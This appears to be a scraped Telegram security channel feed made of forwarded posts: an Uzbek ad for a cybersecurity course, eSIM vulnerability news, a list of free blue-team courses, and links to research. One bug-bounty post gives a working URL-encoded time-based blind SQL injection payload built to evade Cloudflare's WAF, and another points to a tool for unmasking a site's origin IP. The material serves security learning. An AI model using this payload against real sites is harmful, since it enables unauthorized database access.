Forwarded from Brut Security
🛡️ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
❌ Blocked Payload
✅ Bypass Payload
🔍 This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
✅Credit: @nav1n0x
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
❌ Blocked Payload
(select(0)from(select(sleep(10)))v) → 403 Forbidden
✅ Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
🔍 This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
✅Credit: @nav1n0x
Forwarded from Turan Security
This media is not supported in your browser
VIEW IN TELEGRAM
Do'stlar, ko'pchiligingiz uzoq kutgan yangilikni e'lon qilamiz. Turan Security kiberxavfsizlik tashkiloti haqiqiy amaliyotga asoslangan maxsus kiberxavfsizlik kurslariga qabulni ochdi!
Sizda endi qaysi o'quv markazida o'qisam ekan degan savollar bo'lmaydi.
Hujumkor va himoyaviy kiberxavfsizlikni sohaning haqiqiy egalaridan o'rganing. 7 yildan ortiq tajriba va xalqaro sertifikatga ega tajribali mutaxassislar mentorlik qiladi. Bundan tashqari Turan Security mutaxassislari tomonidan amaliyot darslari tashkil qilinadi.
Qabul qilinadigan o'quvchilarimiz:
Umumiy 2 oylik Foundation bosqichida boshlang'ich IT asoslar, tarmoq va linux administratorligi bo'yicha maxsus bilimlarga ega bo'lishadi.
💻 Ushbu bosqichni muvaffaqiyatli tugatgan o'quvchilarga 6 oy davomida ikki yo'nalish, hujumkor (red team) va himoyaviy (blue team) kiberxavfsizlik bo'yicha amaliyotga asoslangan maxsus bilimlar beriladi.
🔴 Red Team: Hujumkor kiberxavfsizlik yo'nalishida tashkilot veb-saytlari, ichki axborot tizimlari va tarmoq tizimlaridagi zaifliklarni aniqlash. Aniqlangan zaifliklardan foydalanib ma'lumotlarga ega bo'lish va qanday qilib zaifliklarni oldini olish bo'yicha bilimlar beriladi.
🔵 Blue Team: Himoyaviy kiberxavfsizlik yo'nalishida esa tashkilot ichki va tashqi tizimlarida aniqlangan zaifliklarni oldini olish, kiberxavfsizlik hodisalarini aniqlash va ularni tahlil qilish, xavflarni aniqlovchi tizimlarni o'rnatish va ularni monitoring qilish bo'yicha amaliy bilimlar beriladi.
O'qishni xohlovchilar batafsil ma'lumot uchun adminga murojaat qiling!
🟦 🟦 🟦
@TuranSecurity | www.turansec.uz | [email protected]
Sizda endi qaysi o'quv markazida o'qisam ekan degan savollar bo'lmaydi.
Hujumkor va himoyaviy kiberxavfsizlikni sohaning haqiqiy egalaridan o'rganing. 7 yildan ortiq tajriba va xalqaro sertifikatga ega tajribali mutaxassislar mentorlik qiladi. Bundan tashqari Turan Security mutaxassislari tomonidan amaliyot darslari tashkil qilinadi.
Qabul qilinadigan o'quvchilarimiz:
Umumiy 2 oylik Foundation bosqichida boshlang'ich IT asoslar, tarmoq va linux administratorligi bo'yicha maxsus bilimlarga ega bo'lishadi.
O'qishni xohlovchilar batafsil ma'lumot uchun adminga murojaat qiling!
@TuranSecurity | www.turansec.uz | [email protected]
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3
https://medium.com/h7w/deep-recon-finding-secrets-in-javascript-with-deep-recon-99abb2c9ad85
If you hava not access, do like this: https://freedium.cfd/URL
If you hava not access, do like this: https://freedium.cfd/URL
Medium
Deep Recon: Finding Secrets in JavaScript with Deep Recon
Combining Asset Discovery and JavaScript Internals to Uncover Hidden APIs, Features, and Vulnerabilities
If you have task web-pentest with cloudflare you can use it for find original IP of target. It's make help you more findings, good luck!
https://github.com/spyboy-productions/CloakQuest3r
https://github.com/spyboy-productions/CloakQuest3r
Forwarded from Хакер — Xakep.RU
Уязвимости eSIM позволяют клонировать карты и шпионить за пользователями
Исследователи AG Security Research обнаружили уязвимости в технологии eSIM, используемой в современных смартфонах. Проблемы затрагивают программный пакет eUICC компании Kigen, который используют миллиарды устройств.
https://xakep.ru/2025/07/14/esim-problems/
Исследователи AG Security Research обнаружили уязвимости в технологии eSIM, используемой в современных смартфонах. Проблемы затрагивают программный пакет eUICC компании Kigen, который используют миллиарды устройств.
https://xakep.ru/2025/07/14/esim-problems/
Forwarded from Cat Seclist
⭕Top Free Blue Team Courses to Boost Your Cybersecurity Skills
The demand for Blue Team professionals — those focused on defense, detection, and response — is growing fast. If you're starting or leveling up in cybersecurity, here are some of the best free resources to get hands-on and stay ahead:
🔹 Blue Team Level 1 – Security Blue Team
Intro to SOC, SIEM, threat detection, Windows/Linux forensics.
🌐 securityblue.team
🔹 CyberDefenders
Gamified labs for SOC, DFIR, SIEM, and threat hunting.
🌐 cyberdefenders.org
🔹 IBM Cybersecurity Analyst – Coursera
Foundations, network defense, SOC tools, and incident response.
🌐 coursera.org
🔹 TryHackMe – Cyber Defence Path
Labs on Blue Team, malware analysis, SIEM, and more.
🌐 tryhackme.com
🔹 DFIR Training
Free forensics and incident response resources.
🌐 dfir.training
🔹 MITRE ATT&CK Defender Training
Learn how to apply MITRE ATT&CK for real-world defense.
🌐 attack.mitre.org
🔹 EDX – Cybersecurity Fundamentals by RIT
Core concepts and defensive strategies.
🌐 edx.org
🎯 Bonus: Google Cybersecurity Certificate (Coursera – free w/ aid)
🌐 coursera.org
The demand for Blue Team professionals — those focused on defense, detection, and response — is growing fast. If you're starting or leveling up in cybersecurity, here are some of the best free resources to get hands-on and stay ahead:
🔹 Blue Team Level 1 – Security Blue Team
Intro to SOC, SIEM, threat detection, Windows/Linux forensics.
🌐 securityblue.team
🔹 CyberDefenders
Gamified labs for SOC, DFIR, SIEM, and threat hunting.
🌐 cyberdefenders.org
🔹 IBM Cybersecurity Analyst – Coursera
Foundations, network defense, SOC tools, and incident response.
🌐 coursera.org
🔹 TryHackMe – Cyber Defence Path
Labs on Blue Team, malware analysis, SIEM, and more.
🌐 tryhackme.com
🔹 DFIR Training
Free forensics and incident response resources.
🌐 dfir.training
🔹 MITRE ATT&CK Defender Training
Learn how to apply MITRE ATT&CK for real-world defense.
🌐 attack.mitre.org
🔹 EDX – Cybersecurity Fundamentals by RIT
Core concepts and defensive strategies.
🌐 edx.org
🎯 Bonus: Google Cybersecurity Certificate (Coursera – free w/ aid)
🌐 coursera.org
🔥1
Forwarded from BugXplorer (j b)
A Novel Technique for SQL Injection in PDO’s Prepared Statements
https://slcyber.io/assetnote-security-research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements/
🪳 @bugxplorer
https://slcyber.io/assetnote-security-research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements/
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1